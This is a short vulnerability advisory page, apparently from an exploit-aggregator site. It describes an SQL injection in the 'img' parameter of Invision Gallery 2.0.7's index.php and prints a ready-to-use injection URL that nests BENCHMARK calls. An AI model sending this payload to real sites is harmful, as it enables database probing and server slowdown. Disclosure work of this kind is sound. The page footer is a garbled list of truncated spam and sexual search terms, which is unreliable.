about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive Talk

exploits , vulnerabilities , articles , Invision Gallery Index.PHP IMG Parameter SQL Injection Vulnerability


Title Invision Gallery Index.PHP IMG Parameter SQL Injection Vulnerability
Published 2006-12-01-12:00AM
Updated 2006-12-04-06:44PM
Class Input Validation Error
CVE  
Remote  Yes
Local  No
Credit  infection@mail.kz is credited with the discovery of this vulnerability.
Vulnerable  Invision Power Services Invision Gallery 2.0.7
Not Vulnerable  
Code   Attackers can exploit these issues via a web client.

The following exploit is available:

http://www.example.com/index.php?automodule=gallery&cmd=postcomment&op=doaddcomment&Post=test&img=111 OR id IN (SELECT BENCHMARK(10000000,BENCHMARK(10000000,md5(current_date))) FROM ipb_gallery_images )
TXT  t3xt 1t!


Advertising

Copyright 2007, SecurityDot
Wed, 03 Dec 2008 19:41:58 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
wwwsax.com t783t com_report sun one www.americ CMS is Fre kamkshutra ifeelmysel www/vidio/ www.89sex. iandian mo bunnyheels CMS is Fre CMS is Fre CMS is Fre news for c www.kar20 CMS is Fre www.df5.co www.sexani Banner kajolsxe cats havin 89six CMS is Fre CMS is Fre CMS is Fre /search/ex download a CMS is Fre famososdes video girl Rss+feend www.89sex. CMS is Fre CMS is Fre CMS is Fre bangladesh www.sex+ex CMS is Fre 889.com Sex scanda Panjabsex sex video CMS is Fre CMS is Fre CMS is Fre dunia sek www.sexiph www.bigcoc